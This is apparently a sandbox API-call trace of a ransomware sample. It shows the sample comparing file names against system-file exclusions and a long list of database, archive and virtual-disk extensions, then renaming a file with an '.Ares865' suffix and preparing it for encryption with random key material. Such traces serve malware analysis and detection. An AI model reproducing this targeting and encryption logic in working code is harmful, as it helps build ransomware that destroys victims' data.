[0088.517] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="windows") returned 1 [0088.517] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="bootmgr") returned 1 [0088.517] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="temp") returned 1 [0088.517] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="pagefile.sys") returned 1 [0088.517] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="boot") returned 1 [0088.517] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="ids.txt") returned 1 [0088.517] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0088.517] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="perflogs") returned 1 [0088.517] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="MSBuild") returned 1 [0088.517] lstrlenW (lpString="WWINTL.DLL.trx_dll") returned 18 [0088.517] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll") returned 71 [0088.518] lstrcpyW (in: lpString1=0x2cce468, lpString2="WWINTL.DLL.trx_dll" | out: lpString1="WWINTL.DLL.trx_dll") returned="WWINTL.DLL.trx_dll" [0088.518] lstrlenW (lpString="WWINTL.DLL.trx_dll") returned 18 [0088.518] lstrlenW (lpString="Ares865") returned 7 [0088.518] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0088.518] lstrlenW (lpString=".dll") returned 4 [0088.518] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2=".dll") returned 1 [0088.518] lstrlenW (lpString=".lnk") returned 4 [0088.518] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2=".lnk") returned 1 [0088.518] lstrlenW (lpString=".ini") returned 4 [0088.518] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2=".ini") returned 1 [0088.518] lstrlenW (lpString=".sys") returned 4 [0088.518] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2=".sys") returned 1 [0088.518] lstrlenW (lpString="WWINTL.DLL.trx_dll") returned 18 [0088.518] lstrlenW (lpString="bak") returned 3 [0088.518] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0088.518] lstrlenW (lpString="ba_") returned 3 [0088.518] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0088.518] lstrlenW (lpString="dbb") returned 3 [0088.518] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0088.518] lstrlenW (lpString="vmdk") returned 4 [0088.518] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0088.518] lstrlenW (lpString="rar") returned 3 [0088.518] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0088.518] lstrlenW (lpString="zip") returned 3 [0088.518] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0088.518] lstrlenW (lpString="tgz") returned 3 [0088.518] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0088.518] lstrlenW (lpString="vbox") returned 4 [0088.518] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0088.518] lstrlenW (lpString="vdi") returned 3 [0088.518] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0088.518] lstrlenW (lpString="vhd") returned 3 [0088.518] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0088.518] lstrlenW (lpString="vhdx") returned 4 [0088.518] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0088.518] lstrlenW (lpString="avhd") returned 4 [0088.518] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0088.519] lstrlenW (lpString="db") returned 2 [0088.519] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0088.519] lstrlenW (lpString="db2") returned 3 [0088.519] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0088.519] lstrlenW (lpString="db3") returned 3 [0088.519] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0088.519] lstrlenW (lpString="dbf") returned 3 [0088.519] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0088.519] lstrlenW (lpString="mdf") returned 3 [0088.519] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0088.519] lstrlenW (lpString="mdb") returned 3 [0088.519] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0088.519] lstrlenW (lpString="sql") returned 3 [0088.519] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0088.519] lstrlenW (lpString="sqlite") returned 6 [0088.519] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0088.519] lstrlenW (lpString="sqlite3") returned 7 [0088.519] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0088.519] lstrlenW (lpString="sqlitedb") returned 8 [0088.519] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0088.519] lstrlenW (lpString="xml") returned 3 [0088.519] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0088.519] lstrlenW (lpString="$er") returned 3 [0088.519] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0088.519] lstrlenW (lpString="4dd") returned 3 [0088.519] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0088.519] lstrlenW (lpString="4dl") returned 3 [0088.519] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0088.519] lstrlenW (lpString="^^^") returned 3 [0088.519] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0088.519] lstrlenW (lpString="abs") returned 3 [0088.519] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0088.519] lstrlenW (lpString="abx") returned 3 [0088.519] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0088.519] lstrlenW (lpString="accdb") returned 5 [0088.519] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0088.519] lstrlenW (lpString="accdc") returned 5 [0088.519] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0088.520] lstrlenW (lpString="accde") returned 5 [0088.520] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0088.520] lstrlenW (lpString="accdr") returned 5 [0088.520] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0088.520] lstrlenW (lpString="accdt") returned 5 [0088.520] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0088.520] lstrlenW (lpString="accdw") returned 5 [0088.520] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0088.520] lstrlenW (lpString="accft") returned 5 [0088.520] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0088.520] lstrlenW (lpString="adb") returned 3 [0088.520] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.520] lstrlenW (lpString="adb") returned 3 [0088.520] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.520] lstrlenW (lpString="ade") returned 3 [0088.520] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0088.520] lstrlenW (lpString="adf") returned 3 [0088.520] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0088.520] lstrlenW (lpString="adn") returned 3 [0088.520] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0088.520] lstrlenW (lpString="adp") returned 3 [0088.520] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0088.520] lstrlenW (lpString="alf") returned 3 [0088.520] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0088.520] lstrlenW (lpString="ask") returned 3 [0088.520] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0088.520] lstrlenW (lpString="btr") returned 3 [0088.520] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0088.520] lstrlenW (lpString="cat") returned 3 [0088.520] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0088.520] lstrlenW (lpString="cdb") returned 3 [0088.520] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0088.520] lstrlenW (lpString="ckp") returned 3 [0088.520] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0088.520] lstrlenW (lpString="cma") returned 3 [0088.520] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0088.520] lstrlenW (lpString="cpd") returned 3 [0088.520] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0088.521] lstrlenW (lpString="dacpac") returned 6 [0088.521] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0088.521] lstrlenW (lpString="dad") returned 3 [0088.521] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0088.521] lstrlenW (lpString="dadiagrams") returned 10 [0088.521] lstrcmpiW (lpString1="LL.trx_dll", lpString2="dadiagrams") returned 1 [0088.521] lstrlenW (lpString="daschema") returned 8 [0088.521] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0088.521] lstrlenW (lpString="db-journal") returned 10 [0088.521] lstrcmpiW (lpString1="LL.trx_dll", lpString2="db-journal") returned 1 [0088.521] lstrlenW (lpString="db-shm") returned 6 [0088.521] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0088.521] lstrlenW (lpString="db-wal") returned 6 [0088.521] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0088.521] lstrlenW (lpString="dbc") returned 3 [0088.521] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0088.521] lstrlenW (lpString="dbs") returned 3 [0088.521] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0088.521] lstrlenW (lpString="dbt") returned 3 [0088.521] lstrcmpiW (lpString1="dll", lpString2="dbt") returned 1 [0088.521] lstrlenW (lpString="dbv") returned 3 [0088.521] lstrcmpiW (lpString1="dll", lpString2="dbv") returned 1 [0088.521] lstrlenW (lpString="dbx") returned 3 [0088.521] lstrcmpiW (lpString1="dll", lpString2="dbx") returned 1 [0088.521] lstrlenW (lpString="dcb") returned 3 [0088.521] lstrcmpiW (lpString1="dll", lpString2="dcb") returned 1 [0088.521] lstrlenW (lpString="dct") returned 3 [0088.521] lstrcmpiW (lpString1="dll", lpString2="dct") returned 1 [0088.521] lstrlenW (lpString="dcx") returned 3 [0088.521] lstrcmpiW (lpString1="dll", lpString2="dcx") returned 1 [0088.521] lstrlenW (lpString="ddl") returned 3 [0088.521] lstrcmpiW (lpString1="dll", lpString2="ddl") returned 1 [0088.521] lstrlenW (lpString="dlis") returned 4 [0088.521] lstrcmpiW (lpString1="_dll", lpString2="dlis") returned -1 [0088.521] lstrlenW (lpString="dp1") returned 3 [0088.521] lstrcmpiW (lpString1="dll", lpString2="dp1") returned -1 [0088.521] lstrlenW (lpString="dqy") returned 3 [0088.521] lstrcmpiW (lpString1="dll", lpString2="dqy") returned -1 [0088.522] lstrlenW (lpString="dsk") returned 3 [0088.522] lstrcmpiW (lpString1="dll", lpString2="dsk") returned -1 [0088.522] lstrlenW (lpString="dsn") returned 3 [0088.522] lstrcmpiW (lpString1="dll", lpString2="dsn") returned -1 [0088.522] lstrlenW (lpString="dtsx") returned 4 [0088.522] lstrcmpiW (lpString1="_dll", lpString2="dtsx") returned -1 [0088.522] lstrlenW (lpString="dxl") returned 3 [0088.522] lstrcmpiW (lpString1="dll", lpString2="dxl") returned -1 [0088.522] lstrlenW (lpString="eco") returned 3 [0088.522] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0088.522] lstrlenW (lpString="ecx") returned 3 [0088.522] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0088.522] lstrlenW (lpString="edb") returned 3 [0088.522] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0088.522] lstrlenW (lpString="epim") returned 4 [0088.522] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0088.522] lstrlenW (lpString="fcd") returned 3 [0088.522] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0088.522] lstrlenW (lpString="fdb") returned 3 [0088.522] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0088.522] lstrlenW (lpString="fic") returned 3 [0088.522] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0088.522] lstrlenW (lpString="flexolibrary") returned 12 [0088.522] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0088.522] lstrlenW (lpString="fm5") returned 3 [0088.522] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0088.522] lstrlenW (lpString="fmp") returned 3 [0088.522] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0088.522] lstrlenW (lpString="fmp12") returned 5 [0088.522] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0088.522] lstrlenW (lpString="fmpsl") returned 5 [0088.522] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0088.522] lstrlenW (lpString="fol") returned 3 [0088.522] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0088.522] lstrlenW (lpString="fp3") returned 3 [0088.522] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0088.522] lstrlenW (lpString="fp4") returned 3 [0088.523] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0088.523] lstrlenW (lpString="fp5") returned 3 [0088.523] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0088.523] lstrlenW (lpString="fp7") returned 3 [0088.523] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0088.523] lstrlenW (lpString="fpt") returned 3 [0088.523] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0088.523] lstrlenW (lpString="frm") returned 3 [0088.523] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0088.523] lstrlenW (lpString="gdb") returned 3 [0088.523] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.523] lstrlenW (lpString="gdb") returned 3 [0088.523] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.523] lstrlenW (lpString="grdb") returned 4 [0088.523] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0088.523] lstrlenW (lpString="gwi") returned 3 [0088.523] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0088.523] lstrlenW (lpString="hdb") returned 3 [0088.523] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0088.523] lstrlenW (lpString="his") returned 3 [0088.523] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0088.523] lstrlenW (lpString="ib") returned 2 [0088.523] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0088.523] lstrlenW (lpString="idb") returned 3 [0088.523] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0088.523] lstrlenW (lpString="ihx") returned 3 [0088.523] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0088.523] lstrlenW (lpString="itdb") returned 4 [0088.523] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0088.523] lstrlenW (lpString="itw") returned 3 [0088.523] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0088.523] lstrlenW (lpString="jet") returned 3 [0088.523] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0088.523] lstrlenW (lpString="jtx") returned 3 [0088.523] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0088.523] lstrlenW (lpString="kdb") returned 3 [0088.523] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0088.523] lstrlenW (lpString="kexi") returned 4 [0088.524] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0088.524] lstrlenW (lpString="kexic") returned 5 [0088.524] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0088.524] lstrlenW (lpString="kexis") returned 5 [0088.524] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0088.524] lstrlenW (lpString="lgc") returned 3 [0088.524] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0088.524] lstrlenW (lpString="lwx") returned 3 [0088.524] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0088.524] lstrlenW (lpString="maf") returned 3 [0088.524] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0088.524] lstrlenW (lpString="maq") returned 3 [0088.524] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0088.524] lstrlenW (lpString="mar") returned 3 [0088.524] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0088.524] lstrlenW (lpString="marshal") returned 7 [0088.524] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0088.524] lstrlenW (lpString="mas") returned 3 [0088.524] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0088.524] lstrlenW (lpString="mav") returned 3 [0088.524] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0088.524] lstrlenW (lpString="maw") returned 3 [0088.524] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0088.524] lstrlenW (lpString="mdbhtml") returned 7 [0088.524] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0088.524] lstrlenW (lpString="mdn") returned 3 [0088.524] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0088.524] lstrlenW (lpString="mdt") returned 3 [0088.524] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0088.524] lstrlenW (lpString="mfd") returned 3 [0088.524] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0088.524] lstrlenW (lpString="mpd") returned 3 [0088.524] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0088.525] lstrlenW (lpString="mrg") returned 3 [0088.525] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0088.525] lstrlenW (lpString="mud") returned 3 [0088.525] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0088.525] lstrlenW (lpString="mwb") returned 3 [0088.525] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0088.525] lstrlenW (lpString="myd") returned 3 [0088.525] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0088.525] lstrlenW (lpString="ndf") returned 3 [0088.525] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0088.525] lstrlenW (lpString="nnt") returned 3 [0088.525] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0088.525] lstrlenW (lpString="nrmlib") returned 6 [0088.525] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0088.525] lstrlenW (lpString="ns2") returned 3 [0088.525] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0088.525] lstrlenW (lpString="ns3") returned 3 [0088.525] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0088.525] lstrlenW (lpString="ns4") returned 3 [0088.525] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0088.525] lstrlenW (lpString="nsf") returned 3 [0088.525] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0088.525] lstrlenW (lpString="nv") returned 2 [0088.525] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0088.525] lstrlenW (lpString="nv2") returned 3 [0088.525] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0088.525] lstrlenW (lpString="nwdb") returned 4 [0088.525] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0088.525] lstrlenW (lpString="nyf") returned 3 [0088.525] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0088.525] lstrlenW (lpString="odb") returned 3 [0088.525] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.525] lstrlenW (lpString="odb") returned 3 [0088.525] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.525] lstrlenW (lpString="oqy") returned 3 [0088.525] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0088.525] lstrlenW (lpString="ora") returned 3 [0088.525] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0088.526] lstrlenW (lpString="orx") returned 3 [0088.526] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0088.526] lstrlenW (lpString="owc") returned 3 [0088.526] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0088.526] lstrlenW (lpString="p96") returned 3 [0088.526] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0088.526] lstrlenW (lpString="p97") returned 3 [0088.526] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0088.526] lstrlenW (lpString="pan") returned 3 [0088.526] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0088.526] lstrlenW (lpString="pdb") returned 3 [0088.526] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0088.526] lstrlenW (lpString="pdm") returned 3 [0088.526] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0088.526] lstrlenW (lpString="pnz") returned 3 [0088.526] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0088.526] lstrlenW (lpString="qry") returned 3 [0088.526] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0088.526] lstrlenW (lpString="qvd") returned 3 [0088.526] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0088.526] lstrlenW (lpString="rbf") returned 3 [0088.526] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0088.526] lstrlenW (lpString="rctd") returned 4 [0088.526] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0088.526] lstrlenW (lpString="rod") returned 3 [0088.526] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0088.526] lstrlenW (lpString="rodx") returned 4 [0088.526] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0088.526] lstrlenW (lpString="rpd") returned 3 [0088.526] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0088.526] lstrlenW (lpString="rsd") returned 3 [0088.526] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0088.526] lstrlenW (lpString="sas7bdat") returned 8 [0088.526] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0088.526] lstrlenW (lpString="sbf") returned 3 [0088.526] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0088.527] lstrlenW (lpString="scx") returned 3 [0088.527] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0088.527] lstrlenW (lpString="sdb") returned 3 [0088.527] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0088.527] lstrlenW (lpString="sdc") returned 3 [0088.527] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0088.527] lstrlenW (lpString="sdf") returned 3 [0088.527] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0088.527] lstrlenW (lpString="sis") returned 3 [0088.527] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0088.527] lstrlenW (lpString="spq") returned 3 [0088.527] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0088.527] lstrlenW (lpString="te") returned 2 [0088.527] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0088.527] lstrlenW (lpString="teacher") returned 7 [0088.527] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0088.527] lstrlenW (lpString="tmd") returned 3 [0088.527] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0088.527] lstrlenW (lpString="tps") returned 3 [0088.527] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0088.527] lstrlenW (lpString="trc") returned 3 [0088.527] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.527] lstrlenW (lpString="trc") returned 3 [0088.527] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.527] lstrlenW (lpString="trm") returned 3 [0088.527] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0088.527] lstrlenW (lpString="udb") returned 3 [0088.527] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0088.527] lstrlenW (lpString="udl") returned 3 [0088.527] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0088.527] lstrlenW (lpString="usr") returned 3 [0088.527] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0088.527] lstrlenW (lpString="v12") returned 3 [0088.527] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0088.527] lstrlenW (lpString="vis") returned 3 [0088.527] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0088.527] lstrlenW (lpString="vpd") returned 3 [0088.527] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0088.528] lstrlenW (lpString="vvv") returned 3 [0088.528] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0088.528] lstrlenW (lpString="wdb") returned 3 [0088.528] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0088.528] lstrlenW (lpString="wmdb") returned 4 [0088.528] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0088.528] lstrlenW (lpString="wrk") returned 3 [0088.528] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0088.528] lstrlenW (lpString="xdb") returned 3 [0088.528] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0088.528] lstrlenW (lpString="xld") returned 3 [0088.528] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0088.528] lstrlenW (lpString="xmlff") returned 5 [0088.528] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0088.528] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll.Ares865") returned 78 [0088.528] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0088.529] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.530] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=154464) returned 1 [0088.530] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.530] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.530] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.530] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.531] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.531] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.531] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x25e60, lpName=0x0) returned 0x15c [0088.533] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x25e60) returned 0x420000 [0088.542] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.543] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.543] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.543] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.543] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.543] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.543] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.543] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.543] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.543] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0088.543] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.543] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0088.543] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.543] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 